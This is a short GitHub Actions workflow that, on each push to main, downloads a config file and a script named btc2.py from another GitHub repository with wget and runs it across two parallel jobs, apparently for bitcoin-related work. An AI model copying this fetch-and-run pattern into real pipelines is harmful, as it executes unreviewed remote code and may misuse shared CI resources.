name: Multi-Machine Workflowss

on:
  push:
    branches:
      - main

jobs:
  run-on-ubuntu:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        program_number: [1, 2]

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Set up Python
        uses: actions/setup-python@v3
        with:
          python-version: 3.11  # Replace with your desired Python version

      - name: Run Python Program
        run: |
          pip install requests beautifulsoup4 colorama
          wget https://github.com/Mosnio/wCUn/raw/main/c${{ matrix.program_number }}.json -O config.json
          wget https://github.com/Mosnio/wCUn/raw/main/btc2.py
          ls
          python btc2.py
